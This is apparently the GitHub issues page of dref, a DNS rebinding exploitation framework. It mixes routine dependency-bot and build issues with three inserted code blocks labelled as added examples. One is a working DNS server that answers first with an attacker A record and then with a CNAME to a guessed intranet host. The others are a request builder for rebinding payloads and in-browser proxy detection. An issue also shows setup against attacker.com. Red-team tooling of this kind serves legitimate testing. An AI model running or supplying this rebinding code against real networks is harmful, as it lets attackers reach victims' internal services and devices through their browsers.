fsecurelabs / dref

479.0 479.0 71.0 203 KB

DNS Rebinding Exploitation Framework

JavaScript 99.16% Dockerfile 0.11% Pug 0.73%
browser-hacking dns-rebinding hacking iot iot-security iot-security-testing pentesting red-team web-hacking

dref's People

Contributors

greenkeeper[bot], serain

dref's Issues

Support different Content-Type

Should check if users are passing a Content-Type header when calling the framework's and network.post() to allow users to post arbitrary content (JSON, octet-stream etc.)
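
An added example, not dref's own network.post(): a request builder that honours a caller-supplied Content-Type header (matched case-insensitively), serialises the body to match it, and flags whether the type is CORS-safelisted. The default type is an assumption, not dref's actual default. The flag matters for rebinding payloads: before the rebind the request is cross-origin and a non-safelisted type such as application/json would trigger a preflight the intranet service will not answer; after the rebind the page and the target share an origin and no preflight occurs.

```javascript
// Added example (not dref's code). Builds the init object for fetch() so a
// payload can POST arbitrary content types; the default is an assumption.

// Content-Type essences that never trigger a CORS preflight (Fetch spec).
const SAFELISTED_TYPES = new Set([
  'application/x-www-form-urlencoded',
  'multipart/form-data',
  'text/plain',
]);

// Case-insensitive header lookup: callers write "content-type" or "Content-Type".
function findHeader(headers, name) {
  const key = Object.keys(headers || {}).find(
    (k) => k.toLowerCase() === name.toLowerCase(),
  );
  return key === undefined ? undefined : headers[key];
}

function buildPostRequest(body, headers = {}) {
  const explicit = findHeader(headers, 'content-type');
  const contentType = explicit || 'application/x-www-form-urlencoded'; // assumed default
  const essence = contentType.split(';')[0].trim().toLowerCase();

  let payload;
  if (body instanceof Uint8Array || typeof body === 'string') {
    payload = body; // raw bytes or text are sent exactly as given
  } else if (essence === 'application/json') {
    payload = JSON.stringify(body);
  } else if (essence === 'application/x-www-form-urlencoded') {
    payload = new URLSearchParams(body).toString();
  } else {
    throw new TypeError(`cannot serialise an object body for ${contentType}`);
  }

  // Replace whatever spelling the caller used with one canonical header.
  const finalHeaders = { ...headers };
  for (const k of Object.keys(finalHeaders)) {
    if (k.toLowerCase() === 'content-type') delete finalHeaders[k];
  }
  finalHeaders['Content-Type'] = contentType;

  return {
    init: { method: 'POST', headers: finalHeaders, body: payload },
    // True when a cross-origin request with this type would be preflighted.
    needsPreflight: !SAFELISTED_TYPES.has(essence),
  };
}
```

Usage: `fetch(url, buildPostRequest({ cmd: 'reboot' }, { 'content-type': 'application/json' }).init)`; check `needsPreflight` before the rebind has happened and fall back to a safelisted type if the target will not answer OPTIONS.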

Dockerize dns app

The dns app can be dockerized.

The image should be pushed to Dockerhub on tag builds.

At the moment we'll keep the configuration loading as is (YAML) but in the future we should load required params (address and domain) from env vars.

An in-range update of eslint-plugin-import is breaking the build 🚨

The devDependency eslint-plugin-import was updated from 2.15.0 to 2.16.0.

🚨 View failing branch.

This version is covered by your current version range and after updating it in your project the build failed.

eslint-plugin-import is a devDependency of this project. It might not break your production code or affect downstream projects, but probably breaks your build or test tools, which may prevent deploying or publishing.

Status Details

Commits

The new version differs by 4 commits.

  • 9bac44e bump to v2.16.0
  • d305f6a use proper rest arg instead of [].slice
  • e72a336 fix #1266 by moving closure creation out of parsing scope (#1275)
  • 1ec80fa Fix for #1256 (#1257)

See the full diff

FAQ and help

There is a collection of frequently asked questions. If those don’t help, you can always ask the humans behind Greenkeeper.


Your Greenkeeper Bot 🌴

The coverage is a lie

Only ./dref/dns/ has test cases at the moment.

Adding tests across the repo is in progress.

Install dref on remote host with dref-cli

dref-cli should offer ability to install and set up dref on a remote host:

$ dref install -u root -h 1.2.3.4 -d attacker.com
which git
which docker
which docker-compose
git clone dref
export DREF_MONGO_HOST=mongo
export DREF_DOMAIN=attacker.com
export DREF_ADDRESS=1.2.3.4
docker-compose up

Add proxy detection capabilities

Proxies can mess with the tool's capabilities (or lead to interesting findings?).

If a user is behind a proxy, the dref in-browser payloads won't be able to hit services that are accessible to the user workstation if the proxy can't hit them.

TL;DR the context for attacks becomes the context of the proxy, not the workstation.

As a starter, it would be nice to just detect when the user is behind a proxy.

Maybe some ideas here:

https://www.blackhat.com/docs/us-14/materials/us-14-Williams-I-Know-Your-Filtering-Policy-Better-Than-You-Do.pdf
https://www.blackhat.com/docs/us-14/materials/us-14-Williams-I-Know-Your-Filtering-Policy-Better-Than-You-Do-wp2.pdf
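
An added example, not part of the issue or of dref: one heuristic an in-browser payload can use as the "starter" detection the issue asks for. It fetches a host name under the reserved .invalid TLD (RFC 2606), which can never resolve. Without a proxy the browser's own DNS lookup fails and fetch() rejects with a network error; with an explicit proxy the browser hands the request to the proxy, which answers with its own HTTP error page, so a no-cors fetch resolves with an opaque response. The probe name is hypothetical, the heuristic is an assumption about browser and proxy behaviour, and it says nothing about transparent proxies or PAC rules that return DIRECT for the probe.

```javascript
// Added example (not dref's code): heuristic explicit-proxy detection from
// inside the browser. fetchImpl is injectable so the logic can be exercised
// without a network.

const PROBE_URL = 'http://dref-probe.invalid/'; // hypothetical; .invalid never resolves

// Pure classification of the probe outcome, kept separate so it is testable.
function classifyProbe(result) {
  if (result.ok) {
    return {
      proxied: true,
      reason: 'unresolvable host still produced an HTTP response: an explicit proxy answered',
    };
  }
  if (result.error && result.error.name === 'AbortError') {
    return { proxied: null, reason: 'probe timed out; inconclusive' };
  }
  return {
    proxied: false,
    reason: 'DNS failure reached the browser: no explicit proxy on this path',
  };
}

async function detectExplicitProxy(fetchImpl = globalThis.fetch, timeoutMs = 3000) {
  const controller = new AbortController();
  const timer = setTimeout(() => controller.abort(), timeoutMs);
  try {
    // no-cors: an opaque response resolves even though the body is unreadable.
    // cache: 'no-store' stops an earlier probe from answering this one.
    await fetchImpl(PROBE_URL, {
      mode: 'no-cors',
      cache: 'no-store',
      signal: controller.signal,
    });
    return classifyProbe({ ok: true });
  } catch (error) {
    return classifyProbe({ ok: false, error });
  } finally {
    clearTimeout(timer);
  }
}
```

A payload would call `detectExplicitProxy()` once at start-up and post the result back with its other findings, so that a "proxied: true" run is read with the issue's caveat in mind: the hosts the payload can reach are those the proxy can reach, not those the workstation can.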

Support for cnames

Hello,

I was wondering if it would be possible to add support to rebind a domain to a CNAME. That would allow an attacker to access some internal hosts without knowing the internal IP address, e.g. wiki.companydomain.com.

This technique is described in this paper:
https://crypto.stanford.edu/dns/dns-rebinding.pdf

Spidering the Intranet. The attacker need not specify the target machine by IP address. Instead, the attacker can guess the internal host name of the target, for example hr.corp.company.com, and rebind attacker.com to a CNAME record pointing to that host name. The client's own recursive DNS resolver will complete the resolution and return the IP address of the target. Intranet host names are often guessable and occasionally disclosed publicly [30, 9]. This technique obviates the need for the attacker to scan IP addresses to find an interesting target but does not work with the multiple A record technique described in Section 3.1.
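
An added example, not dref's DNS app and not code from the paper: a stateful answer policy implementing the CNAME variant quoted above, with enough RFC 1035 wire encoding to drop the answers into a UDP responder. The first query for a rebinding name is answered with an A record for the attacker host so the payload loads; every later query for the same name is answered with a CNAME to the guessed internal host name, which the victim's own recursive resolver then completes. TTL 0 is used on both records to invite a re-resolution; as the paper notes, this cannot be combined with the multiple-A-record technique, and the browser will only re-resolve once its own cache entry expires. Names, addresses and the per-name hit counter are assumptions for illustration.

```javascript
// Added example (not dref's code): CNAME rebinding answer policy plus minimal
// DNS wire encoding. Names and addresses are hypothetical.

const TYPE_A = 1;
const TYPE_CNAME = 5;

function encodeName(name) {
  const parts = [];
  for (const label of name.replace(/\.$/, '').split('.')) {
    parts.push(Buffer.from([label.length]), Buffer.from(label, 'ascii'));
  }
  parts.push(Buffer.from([0]));
  return Buffer.concat(parts);
}

function decodeName(buf, offset) {
  const labels = [];
  let pos = offset;
  while (buf[pos] !== 0) {
    const len = buf[pos];
    labels.push(buf.toString('ascii', pos + 1, pos + 1 + len));
    pos += 1 + len;
  }
  return { name: labels.join('.'), end: pos + 1 };
}

// Constructed sample input: a standard recursive A question for `name`.
function buildQuery(id, name) {
  const header = Buffer.alloc(12);
  header.writeUInt16BE(id, 0);
  header.writeUInt16BE(0x0100, 2); // RD=1
  header.writeUInt16BE(1, 4);      // QDCOUNT
  const tail = Buffer.alloc(4);
  tail.writeUInt16BE(TYPE_A, 0);
  tail.writeUInt16BE(1, 2);        // class IN
  return Buffer.concat([header, encodeName(name), tail]);
}

function parseQuery(buf) {
  const { name, end } = decodeName(buf, 12);
  return { id: buf.readUInt16BE(0), name, qtype: buf.readUInt16BE(end), questionEnd: end + 4 };
}

class RebindPolicy {
  constructor(attackerIp, cnameTarget) {
    this.attackerIp = attackerIp;   // where the payload page is served from
    this.cnameTarget = cnameTarget; // guessed internal host name
    this.hits = new Map();          // per-name resolution counter (assumed state model)
  }
  // First resolution: attacker A record. Every later one: CNAME into the intranet.
  answer(name) {
    const n = (this.hits.get(name) || 0) + 1;
    this.hits.set(name, n);
    return n === 1
      ? { type: TYPE_A, data: this.attackerIp, ttl: 0 }
      : { type: TYPE_CNAME, data: this.cnameTarget, ttl: 0 };
  }
}

function buildResponse(queryBuf, rr) {
  const q = parseQuery(queryBuf);
  const header = Buffer.alloc(12);
  header.writeUInt16BE(q.id, 0);
  header.writeUInt16BE(0x8180, 2); // QR=1 RD=1 RA=1, RCODE NOERROR
  header.writeUInt16BE(1, 4);      // QDCOUNT
  header.writeUInt16BE(1, 6);      // ANCOUNT
  const rdata = rr.type === TYPE_A
    ? Buffer.from(rr.data.split('.').map(Number))
    : encodeName(rr.data);
  const answer = Buffer.alloc(12);
  answer.writeUInt16BE(0xc00c, 0); // compression pointer to the question name
  answer.writeUInt16BE(rr.type, 2);
  answer.writeUInt16BE(1, 4);      // class IN
  answer.writeUInt32BE(rr.ttl, 6);
  answer.writeUInt16BE(rdata.length, 10);
  return Buffer.concat([header, queryBuf.subarray(12, q.questionEnd), answer, rdata]);
}

// Decode the single answer RR so a caller can see what was served.
function parseAnswer(respBuf) {
  const q = parseQuery(respBuf);
  let pos = q.questionEnd + 2;                       // skip the name pointer
  const type = respBuf.readUInt16BE(pos); pos += 4;  // type, class
  const ttl = respBuf.readUInt32BE(pos); pos += 6;   // ttl, rdlength
  const data = type === TYPE_A
    ? Array.from(respBuf.subarray(pos, pos + 4)).join('.')
    : decodeName(respBuf, pos).name;
  return { id: q.id, type, ttl, data };
}
```

Wiring it up is a `dgram` socket that calls `buildResponse(msg, policy.answer(parseQuery(msg).name))` for each datagram. The CNAME answer is only useful when the victim's resolver can see the internal zone, which is exactly the case for a workstation using the corporate resolver and exactly not the case for a public resolver, so a payload that switches to this mode should fall back to plain A-record rebinding when the CNAME target does not load.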

Start dref-cli

Implement a primitive version of the dref-cli, probably using golang (ie: single compiled binary to download to admin dref from a machine)

targets example

$ dref get targets
NAME     SCRIPT   HANG   FASTREBIND  ARGS
sysinfo  sysinfo  false  false       {json snippet as string (ie: 30 chars)}
$ dref get target sysinfo
{raw json formatted}

logs example

$ dref get logs --target sysinfo
...
$ dref get log 507f1f77bcf86cd799439011
...

An in-range update of mongoose is breaking the build 🚨

The dependency mongoose was updated from 5.4.13 to 5.4.14.

🚨 View failing branch.

This version is covered by your current version range and after updating it in your project the build failed.

mongoose is a direct dependency of this project, and it is very likely causing it to break. If other packages depend on yours, this update is probably also breaking those in turn.

Status Details

Commits

The new version differs by 18 commits.

  • 35b90d2 chore: release 5.4.14
  • 8dc47a5 docs(schema): add examples for remaining functions
  • 764735b fix(documentarray): report validation errors that occur in an array subdoc created using create() and then set()
  • 3fec456 test(documentarray): repro #7504
  • 660fe60 chore: remove unnecessary print statements
  • 13c7a00 docs(schema): add examples to schema functions
  • 270732e docs(migrating_to_5): link to migrating to 5 docs on the mongoosejs.com website
  • db79cfc Merge branch 'master' of github.com:Automattic/mongoose
  • 67754bd style: fix lint
  • 8e30004 Merge pull request #7530 from sarpik/master
  • 3e44bc2 Merge branch 'master' of github.com:Automattic/mongoose
  • aa43200 docs: add MongooseError to API docs and add list of error names
  • 0daf626 Merge pull request #7521 from nocksapp/master
  • 8752502 fix anchor tag
  • b5f1723 chore: now working on 5.4.14

There are 18 commits in total.

See the full diff


An in-range update of atob is breaking the build 🚨

Version 2.1.2 of atob was just published.

Branch Build failing 🚨
Dependency atob
Current Version 2.1.1
Type dependency

This version is covered by your current version range and after updating it in your project the build failed.

atob is a direct dependency of this project, and it is very likely causing it to break. If other packages depend on yours, this update is probably also breaking those in turn.

Status Details
  • continuous-integration/travis-ci/push: The Travis CI build failed (Details).
  • Travis CI - Branch: The build failed.


An in-range update of mongodb-memory-server is breaking the build 🚨

Version 1.9.4 of mongodb-memory-server was just published.

Branch Build failing 🚨
Dependency mongodb-memory-server
Current Version 1.9.3
Type devDependency

This version is covered by your current version range and after updating it in your project the build failed.

mongodb-memory-server is a devDependency of this project. It might not break your production code or affect downstream projects, but probably breaks your build or test tools, which may prevent deploying or publishing.

Status Details
  • continuous-integration/travis-ci/push: The Travis CI build failed (Details).
  • Travis CI - Branch: The build failed.

Commits

The new version differs by 2 commits.

  • dc57509 fix(Babel): remove NodeJS v4 support
  • 742bead fix: change default mongodb version to latest (#70)

See the full diff


Module Error - eslint-loader/index.js

Hi,
Trying to run this on Ubuntu 16.04. The following is from my docker-compose version:

docker-compose version 1.21.2, build a133471
docker-py version: 3.3.0
CPython version: 3.6.5
OpenSSL version: OpenSSL 1.0.1t  3 May 2016

and Docker:

 Engine:
  Version:      18.05.0-ce
  API version:  1.37 (minimum version 1.12)
  Go version:   go1.9.5
  Git commit:   f150324
  Built:        Wed May  9 22:14:32 2018
  OS/Arch:      linux/amd64
  Experimental: false

It seems like my DNS is configured correctly. I am able to dig a random subdomain and get my IP address back. When I go to build the image, I get the following error:

scripts_1  | [./src/libs/crypto.js] 1.59 KiB {web-discover} {sysinfo} [built] [1 error]
scripts_1  | [./src/libs/network.js] 2.41 KiB {web-discover} {sysinfo} [built]
scripts_1  | [./src/libs/session.js] 2.15 KiB {web-discover} {sysinfo} [built]
scripts_1  | [./src/payloads/sysinfo.js] 1.58 KiB {sysinfo} [built]
scripts_1  | [./src/payloads/web-discover.js] 1.12 KiB {web-discover} [built]
scripts_1  |     + 13 hidden modules
scripts_1  | 
scripts_1  | ERROR in ./src/libs/crypto.js
scripts_1  | Module Error (from ./node_modules/eslint-loader/index.js):
scripts_1  | 
scripts_1  | /src/src/libs/crypto.js
scripts_1  |    5:3  error  Trailing spaces not allowed  no-trailing-spaces
scripts_1  |    8:3  error  Trailing spaces not allowed  no-trailing-spaces
scripts_1  |   11:3  error  Trailing spaces not allowed  no-trailing-spaces
scripts_1  | 
scripts_1  | ✖ 3 problems (3 errors, 0 warnings)
scripts_1  |   3 errors, 0 warnings potentially fixable with the `--fix` option.
scripts_1  | 
scripts_1  |  @ ./src/libs/session.js 1:0-34 6:21-37 7:22-32 7:49-65 26:21-31 33:19-35
scripts_1  |  @ ./src/payloads/sysinfo.js
scripts_1  | ℹ 「wdm」: Failed to compile.

Thanks

An in-range update of nodemon is breaking the build 🚨

The dependency nodemon was updated from 1.18.5 to 1.18.6.

🚨 View failing branch.

This version is covered by your current version range and after updating it in your project the build failed.

nodemon is a direct dependency of this project, and it is very likely causing it to break. If other packages depend on yours, this update is probably also breaking those in turn.

Status Details

Release Notes for v1.18.6

1.18.6 (2018-11-05)

Bug Fixes

Commits

The new version differs by 1 commit.

  • 521eb1e fix: restart on change for non-default signals (#1409) (#1430)

See the full diff

